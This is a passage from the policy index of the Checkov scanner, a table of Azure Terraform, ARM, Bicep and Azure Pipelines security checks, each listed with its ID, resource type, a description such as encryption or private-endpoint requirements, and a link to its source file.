[SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | -| 1991 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | -| 1992 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | -| 1993 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1994 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1995 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | -| 1996 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | -| 1997 | CKV_AZURE_230 
| resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | -| 1998 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | -| 1999 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | -| 2000 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | -| 2001 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | -| 2002 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | -| 2003 | CKV_AZURE_236 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | 
arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 2004 | CKV_AZURE_236 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 2005 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | -| 2006 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 2007 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 2008 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2009 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2010 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2011 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2012 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2013 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2014 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2015 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | 
[VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2016 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2017 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2018 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2019 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2020 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | 
[AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 2021 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 2022 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | -| 2023 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2024 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2025 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2026 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are 
utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | -| 2027 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 2028 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 2029 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | -| 2030 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | -| 2031 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 2032 | CKV2_AZURE_13 | resource | 
azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 2033 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2034 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2035 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 2036 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2037 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2038 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform 
| [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2039 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2040 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 2041 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2042 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2043 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2044 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for 
Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2045 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2046 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2047 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2048 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2049 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 2050 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured 
with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 2051 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 2052 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 2053 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 2054 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2055 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2056 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | 
[AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 2057 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 2058 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 2059 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 2060 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 2061 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 2062 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | 
[AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 2063 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 2064 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 2065 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 2066 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | -| 2067 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | -| 2068 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | 
[AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2069 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2070 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2071 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2072 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | -| 2073 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | -| 2074 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is 
configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | -| 2075 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | -| 2076 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | -| 2077 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | -| 2078 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2079 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2080 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | 
Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | -| 2081 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2082 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2083 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2084 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2085 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2086 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | 